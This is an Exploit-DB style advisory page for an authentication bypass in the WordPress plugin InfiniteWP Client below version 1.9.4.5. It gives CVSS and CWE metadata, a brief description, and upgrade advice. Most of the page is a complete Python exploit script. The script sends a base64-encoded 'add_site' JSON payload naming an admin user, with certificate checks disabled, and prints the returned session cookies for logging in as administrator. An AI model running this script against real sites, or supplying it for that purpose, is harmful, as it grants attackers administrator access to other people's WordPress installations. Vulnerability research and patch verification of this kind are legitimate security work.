Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass

vendor:

Wordpress Plugin InfiniteWP Client

by:

Raphael Karger

8.8

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Wordpress Plugin InfiniteWP Client

Affected Version From: InfiniteWP Client < 1.9.4.5

Affected Version To: InfiniteWP Client < 1.9.4.5

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

WordPress Plugin InfiniteWP Client 1.9.4.5 – Authentication Bypass

An authentication bypass vulnerability exists in Wordpress Plugin InfiniteWP Client version 1.9.4.5 and prior. An attacker can exploit this vulnerability to bypass authentication and gain access to the application. This is achieved by sending a specially crafted HTTP request to the vulnerable application. The request contains a specially crafted JSON payload that is base64 encoded and sent as part of the request. This payload contains a username parameter that is used to bypass authentication.

Mitigation:

Upgrade to InfiniteWP Client version 1.9.4.5 or later.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
# Date: 2020-1-16
# Exploit Author: Raphael Karger
# Vendor Homepage: https://infinitewp.com/
# Version: InfiniteWP Client < 1.9.4.5

#!/usr/bin/python3

import requests
import json
import argparse
import base64
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit(site, username):
    json_info = {"iwp_action":"add_site","params":{"username": username}}
    try:
        return requests.post(site, timeout=5, verify=False,
            headers={"User-Agent" : "raphaelrocks"},
            data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8"))
        )
    except Exception as e:
        print("[-] HTTP Exploit Error: {}".format(e))
    return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
    parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
    args = parser.parse_args()
    site_exploit = exploit(args.url, args.username)
    if site_exploit and site_exploit.status_code == requests.codes.ok:
        cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()])
        if cookie_string:
            print("[+] Use Cookies to Login: \n{}".format(cookie_string))
            exit(0)
    print("[-] Exploit Failed")